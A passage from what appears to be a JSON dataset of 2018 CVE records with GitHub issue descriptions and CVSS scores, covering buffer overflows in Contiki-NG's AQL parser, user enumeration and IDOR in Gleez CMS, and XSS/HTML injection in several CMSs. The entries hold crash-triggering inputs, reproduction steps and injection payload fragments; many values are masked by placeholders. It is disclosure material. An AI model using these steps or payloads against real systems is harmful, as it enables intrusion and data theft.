        "description": "Stack based buffer overflow while parsing AQL (storage of relations). Macro AQL_ADD_RELATION write data into stack based fixed size buffer named relations without any check on number and sizes of added relations. Buffer is declared as: APITAG struct aql_adt { char APITAG NUMBERTAG db APITAG define AQL_RELATION_LIMIT NUMBERTAG db APITAG define RELATION_NAME_LENGTH NUMBERTAG usage: APITAG define AQL_ADD_RELATION(adt, rel) \\ strcpy((adt) >relations[(adt) >relation_count++], (rel)) Following AQL code samples will trigger crash: SELECT t FROM APITAG This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). Please take a note, that before going over the whole aql_adt structure firstly other values in the struct are overwritten, which may produce other integrity issues. The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG critical) Mitigation: Before adding relation to the struct the size of new relation and the number of already stored relations should be checked. Please take a look at patch fixing this issue in APITAG (using antelope engine as arastorage): FILETAG FILETAG Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc8fd NUMBERTAG f NUMBERTAG at pc NUMBERTAG f NUMBERTAG e3d NUMBERTAG bp NUMBERTAG ffc8fd NUMBERTAG sp NUMBERTAG ffc8fd NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffc8fd NUMBERTAG f NUMBERTAG thread T NUMBERTAG f NUMBERTAG e3d NUMBERTAG PATHTAG NUMBERTAG e NUMBERTAG d in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG f7 in parse_relations PATHTAG NUMBERTAG f7 in parse_relations PATHTAG NUMBERTAG f7 in parse_select PATHTAG NUMBERTAG in aql_parse PATHTAG NUMBERTAG e in main PATHTAG NUMBERTAG f NUMBERTAG dfc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffc8fd NUMBERTAG f NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG bf in main PATHTAG This frame has NUMBERTAG object(s NUMBERTAG parsed_aql' APITAG NUMBERTAG fa6fe NUMBERTAG f4]f4 f4 f3 f3 f3 f NUMBERTAG fa6ff NUMBERTAG fa NUMBERTAG fa NUMBERTAG fa NUMBERTAG fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-16664",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/596",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/596",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2018-07-09T14:58:52Z",
        "description": "Global buffer overflow while parsing AQL (lvm_set_op, lvm_set_relation, lvm_set_operand). Functions lvm_set_op, lvm_set_relation, lvm_set_operand try to memcpy input data (part of AQL files) into fixed size buffer lvm_instance_t >vmcode. Allocated buffer can fit only DB_VM_BYTECODE_SIZE NUMBERTAG bytes and the check is missing. Declaration: db APITAG define DB_VM_BYTECODE_SIZE NUMBERTAG aql APITAG static unsigned char vmcode[DB_VM_BYTECODE_SIZE]; This could potentially lead to Remote Code Execution, but attack is more difficult, because buffer is stored in global data segment and buffer is filled with bytecode, not directly by user provided data APITAG APITAG The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG high) Following AQL code samples will trigger crash: APITAG REMOVE FROM aaa WHERE a NUMBERTAG COUNT a INLINE a TYPE NUMBERTAG a / APITAG NUMBERTAG bb NUMBERTAG f9]f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2018-16665",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/598",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/598",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2018-07-09T15:09:23Z",
        "description": "Global buffer overflow while parsing AQL (lvm_shift_for_operator). Function APITAG write data into global fixed size buffer named vmcode, with wrong size check. Buffer is declared as: db APITAG define DB_VM_BYTECODE_SIZE NUMBERTAG aql APITAG static unsigned char vmcode[DB_VM_BYTECODE_SIZE]; Following line (at lvm.c line NUMBERTAG moves the data by (sizeof(operator_t) + sizeof(node_type_t)) bytes to the right: memmove(ptr + sizeof(operator_t) + sizeof(node_type_t), ptr, old_end end); while following check (at lvm.c line NUMBERTAG adds only sizeof(operator_t): if(p >end + sizeof(operator_t) > p >size || end >= old_end) Following AQL code samples will trigger crash: SELECT a from a WHERE NUMBERTAG This buffer overflow is not likely to lead to Remote Code Execution, because size of overflow is only NUMBERTAG bytes. Therefore it is possible to only to crash the AQL engine or manipulate the data in other buffers, this leads to risk reduction APITAG APITAG APITAG Additionaly the risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG Medium) Mitigation: Following check (at line NUMBERTAG if(p >end + sizeof(operator_t) > p >size || end >= old_end) should be changed to: if(p >end + sizeof(operator_t) + sizeof(node_type_t) > p >size || end >= old_end) Crash details using Address Sanitizer NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c NUMBERTAG at pc NUMBERTAG f NUMBERTAG d NUMBERTAG e NUMBERTAG bp NUMBERTAG ffe1f NUMBERTAG d0 sp NUMBERTAG ffe1f NUMBERTAG a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c NUMBERTAG thread T NUMBERTAG f NUMBERTAG d NUMBERTAG e NUMBERTAG in __asan_memmove ( PATHTAG NUMBERTAG in lvm_shift_for_operator PATHTAG NUMBERTAG a in parse_expr PATHTAG NUMBERTAG in parse_expr PATHTAG NUMBERTAG a4 in parse_comparison PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_where PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_select PATHTAG NUMBERTAG b NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG f NUMBERTAG ccca NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'p' defined in 'aql APITAG NUMBERTAG c0a0) of size NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'vmcode' defined in 'aql APITAG NUMBERTAG c NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow NUMBERTAG asan_memmove Shadow bytes around the buggy address NUMBERTAG bb7c NUMBERTAG bb7d NUMBERTAG bb7e NUMBERTAG bb7f NUMBERTAG bb NUMBERTAG bb NUMBERTAG f9]f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 4.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-16666",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/595",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/595",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2018-07-09T14:57:37Z",
        "description": "Stack based buffer overflow while parsing AQL (parsing next string). Function next_string that provides next string during AQL parsing tries to memcpy input data (part of AQL files) into fixed size buffer. Allocated buffer can fit only DB_MAX_ELEMENT_SIZE NUMBERTAG bytes and the check is missing. Crashing line: aql APITAG Declaration of buffer: APITAG typedef char value_t[DB_MAX_ELEMENT_SIZE]; APITAG define DB_MAX_ELEMENT_SIZE NUMBERTAG APITAG value_t value; aql APITAG NUMBERTAG int lexer_start(lexer_t lexer, char input, token_t token, value_t value) { lexer >input = input; lexer >prev_pos = input; lexer >token = token; lexer >value = value; Overflow: aql APITAG memcpy(lexer >value, s, length); This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG critical) Following AQL code will trigger crash APITAG SELECT APITAG Mitigation : The size of input string should be limited to DB_MAX_ELEMENT_SIZE. Please take a look at patch fixing this issue in APITAG (using antelope engine as arastorage): URLTAG Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd5e7b NUMBERTAG f0 at pc NUMBERTAG fb NUMBERTAG bp NUMBERTAG ffd5e7b NUMBERTAG d0 sp NUMBERTAG ffd5e7b NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffd5e7b NUMBERTAG f0 thread T NUMBERTAG fb NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG in next_string PATHTAG NUMBERTAG in lexer_next PATHTAG NUMBERTAG d NUMBERTAG in parse_aggregator PATHTAG NUMBERTAG d NUMBERTAG in parse_attributes PATHTAG NUMBERTAG ERRORTAG NUMBERTAG a4 in parse_attributes PATHTAG NUMBERTAG ERRORTAG NUMBERTAG a4 in parse_select PATHTAG NUMBERTAG b NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG fb NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffd5e7b NUMBERTAG f0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f in aql_parse PATHTAG This frame has NUMBERTAG object(s NUMBERTAG token NUMBERTAG le NUMBERTAG name NUMBERTAG alue' APITAG NUMBERTAG bceea NUMBERTAG f2 f2 f2 f NUMBERTAG f4 f4 f2 f2 f2 f NUMBERTAG f4]f NUMBERTAG bceea NUMBERTAG f3 f3 f3 f NUMBERTAG f1 f1 f1 f NUMBERTAG bceea NUMBERTAG bceeaa NUMBERTAG bceeab NUMBERTAG f4 f4 f4 f3 f3 f3 f NUMBERTAG bceeac NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-16667",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/597",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/597",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2018-07-09T15:08:31Z",
        "description": "Global buffer overflow while parsing AQL (lvm_register_variable, lvm_set_variable_value, create_intersection, create_union). Functions APITAG APITAG APITAG APITAG write data into global fixed size buffers named variables and derivations making off by one error. Additionally functions APITAG APITAG APITAG (only in DEBUG mode), APITAG read the data from buffers variables and derivations making similar off by one error. Buffers are declared as: APITAG static variable_t variables[LVM_MAX_VARIABLE_ID NUMBERTAG APITAG static derivation_t APITAG NUMBERTAG Sample usage: APITAG for(var = variables; var APITAG name NUMBERTAG ar++) { Following AQL code samples will trigger crash: SELECT NUMBERTAG FROM NUMBERTAG WHERE NUMBERTAG This could potentially lead to Remote Code Execution, but attack is more difficult, because buffer is stored in global data segment APITAG APITAG The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG high) Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c NUMBERTAG at pc NUMBERTAG bp NUMBERTAG fff5f NUMBERTAG b0 sp NUMBERTAG fff5f NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG c NUMBERTAG thread T NUMBERTAG in lookup PATHTAG NUMBERTAG in lvm_register_variable PATHTAG NUMBERTAG db in parse_operand PATHTAG NUMBERTAG db in parse_expr PATHTAG NUMBERTAG a4 in parse_comparison PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_where PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_select PATHTAG NUMBERTAG b NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG f NUMBERTAG bbeb NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'global_data_size' defined in APITAG NUMBERTAG c NUMBERTAG of size NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'variables' defined in APITAG NUMBERTAG c1e0) of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG lookup Shadow bytes around the buggy address NUMBERTAG bb7f NUMBERTAG bb NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9[f9]f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG bb NUMBERTAG bb NUMBERTAG bb NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2018-16703",
        "Issue_Url_old": "https://github.com/gleez/cms/issues/802",
        "Issue_Url_new": "https://github.com/gleez/cms/issues/802",
        "Repo_new": "gleez/cms",
        "Issue_Created_At": "2018-09-07T12:40:51Z",
        "description": "Unauthenticated user enumeration and Possible account brute force leading to account compromise. Description : A vulnerability in the Gleez CMS login page could allow an unauthenticated, remote attacker to perform multiple user enumeration, which can further help attacker to perform login attempts in excess of the configured login attempt limit. The vulnerability is due to insufficient server side access control and login attempt limit enforcement. An attacker could exploit this vulnerability by sending modified login attempts to the Portal login page. An exploit could allow the attacker to identify existing users and perform brute force password attacks on the Portal. Proof of concept : Any unauthenticated user can perform user enumeration by changing id in the below URL. URLTAG This can help user to identify the user names registered on the CMS portal. Since there is account lockout implement, the brute force attempt can be successfully executed. Also, there is no password complexity or strength defined while creating account, which means passwords of significantly smaller length could be set, which makes it easy for the attacker. Version : Gleez CMS NUMBERTAG Impact : This can lead to confidentiality impact and potential account compromise.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16704",
        "Issue_Url_old": "https://github.com/gleez/cms/issues/801",
        "Issue_Url_new": "https://github.com/gleez/cms/issues/801",
        "Repo_new": "gleez/cms",
        "Issue_Created_At": "2018-09-07T10:54:59Z",
        "description": "Insecure Direct Object Reference View other user profiles. Description : Observed IDOR vulnerability in demo site FILETAG It will be possible attackers(logged in user) to view profile page of other users. Version : Gleez CMS NUMBERTAG ulnerability type: Insecure Direct Object Reference Steps to reproduce NUMBERTAG Login as a demo user Username : demo Password : demo NUMBERTAG After login, you can observe the URL URLTAG in the address bar NUMBERTAG Change the user ID, from NUMBERTAG to NUMBERTAG You be will be able to view other user name and their profile page. Impact The vulnerability if exploited can allow users to view profile of any other user which the user is not entitled to. The attacker can view the following NUMBERTAG Username NUMBERTAG Profile photo NUMBERTAG Last visited date NUMBERTAG Joined date NUMBERTAG Number of visits",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16726",
        "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/52",
        "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/52",
        "Repo_new": "smiffy6969/razorCMS",
        "Issue_Created_At": "2018-08-16T10:38:26Z",
        "description": "HTML injection found. \u2022 APITAG version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG ULNERABILTY TYPE: HTML injection. VULNERABILITY DESCRIPTION: HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. This vulnerability occurs when the user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) the legit from the malicious parts and consequently will parse and execute all as legit in the victim context. There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is a high risk of XSS, specifically an HTML injection one. Malicious HTML code could be injected for example via APITAG that is used to render user inserted HTML code. If strings are not correctly sanitized the problem could lead to XSS based HTML injection. Another method could be APITAG Steps to reproduce NUMBERTAG Login to APITAG NUMBERTAG Go to setting and Edit the Homepage NUMBERTAG In the description, parameter insert the malicious HTML payload \"> APITAG youare hacked by a malicious hacker APITAG NUMBERTAG Save the page details NUMBERTAG Go to the homepage and refresh the browser, you will see the malicious content displayed on the browser. Proof of concept: Vulnerable URL: URLTAG Vulnerable Parameter: Description Malicious payload: \"> APITAG you are hacked by a malicious hacker APITAG NUMBERTAG enter the malicious payload \"> APITAG you are hacked by a malicious hacker APITAG into the description parameter. FILETAG NUMBERTAG After saving the details return to the homepage and refresh the browser, you will get that malicious HTML payload displayed on the browser. Submitted by: Ritesh kumar Reference: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16727",
        "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/51",
        "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/51",
        "Repo_new": "smiffy6969/razorCMS",
        "Issue_Created_At": "2018-08-15T11:50:53Z",
        "description": "Stored Cross site Scripting (XSS) found.. \u2022 APITAG version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG ulnerability type: Cross site scripting(XSS) Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user\u2019s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second order XSS. This vulnerability can be used to conduct a number of browser based attacks including: Hijacking another user's browser Capturing sensitive information viewed by application users Pseudo defacement of the application Port scanning of internal hosts (\"internal\" in relation to the users of the web application) Directed delivery of browser based exploits Other malicious activities Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario: Attacker stores malicious code into the vulnerable page The user authenticates in the application User visits the vulnerable page Malicious code is executed by the user's browser This type of attack can also be exploited with browser exploitation frameworks such as APITAG XSS Proxy and Backframe. These frameworks allow for complex APITAG exploit development. Stored XSS is particularly dangerous in application areas where users with high privileges have access. When the administrator visits the vulnerable page, the attack is automatically executed by their browser. This might expose sensitive information such as session authorization tokens. STEPS TO REPRODUCE NUMBERTAG Login to APITAG NUMBERTAG Go to setting and Edit the Homepage NUMBERTAG In the keywords parameter enter the malicious XSS script APITAG \"> APITAG and enter some text in description parameter and save the page details NUMBERTAG Go to the homepage and either refresh the browser or refresh the home page, the malicious javascript will prompt on the browser. Proof Of Concept: Vulnerable URL: URLTAG Vulnerable parameter: Keywords Malicious XSS payload: APITAG \"> APITAG Vulnerable source code: FILETAG NUMBERTAG Go for editing the homepage and enter XSS payload APITAG \"> APITAG in Keywords field, enter some text in description part and save the page details. FILETAG NUMBERTAG After saving go to home page and either refresh the page or click on home, the malicious payload will be prompted on the browser. FILETAG Submitted by: Ritesh Kumar Reference: URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16728",
        "Issue_Url_old": "https://github.com/frozeman/feindura-flat-file-cms/issues/29",
        "Issue_Url_new": "https://github.com/frozeman/feindura-flat-file-cms/issues/29",
        "Repo_new": "frozeman/feindura-flat-file-cms",
        "Issue_Created_At": "2018-08-15T10:59:46Z",
        "description": "Reflected cross site scripting found (XSS). \u2022 Fiendura version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG ULNERABILITY TYPE: cross site scripting. Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. STEPS TO REPRODUCE NUMBERTAG login in Fiendura NUMBERTAG Go for creating a new page by clicking on the new page NUMBERTAG In the tags parameter, type the malicious javascript APITAG \"> APITAG NUMBERTAG The malicious javascript will be reflected in the browser. PROOF OF CONCEPT: Vulnerable URL: URLTAG Vulnerable parameter: Tags Malicious script: APITAG \"> APITAG NUMBERTAG enter the malicious javascript in the Tags parameter. FILETAG NUMBERTAG after entering the payload an XSS prompt will be reflected on the browser. FILETAG Submitted: Ritesh Kumar Reference: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16729",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/63",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/63",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2018-08-12T16:14:36Z",
        "description": "XSS via svg fileupload : Pluck NUMBERTAG Affected software: Pluck NUMBERTAG Author: Ritesh kumar Description: SVG files can contain Javascript in APITAG tags. Browsers are smart enough to ignore scripts embedded in SVG files included via IMG tags. However, a direct request for an SVG file will result in the scripts being executed. So an embedded SVG as an attachment in an issue or avatar does not execute the code, but if a user clicks on the attachment the code will execute. Steps to reproduce NUMBERTAG login to pluck NUMBERTAG click on pages >manage files then browse and upload an malicious svg file which contain xss payload NUMBERTAG Now open that file which was saved as xss.svg the below output will be shown. URL Where XSS got executed FILETAG FILETAG Vulnerable url: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16749",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1119",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1119",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-05-01T22:12:58Z",
        "description": "APITAG assertion failed. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Assertion fail in APITAG . APITAG Found with a modified version of the kAFL fuzzer ( URLTAG Credits: Sergej Schumilo, Cornelius Aschermann APITAG Universit\u00e4t Bochum) Steps to Reproduce APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS Additional information: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16750",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1118",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1118",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-05-01T22:09:49Z",
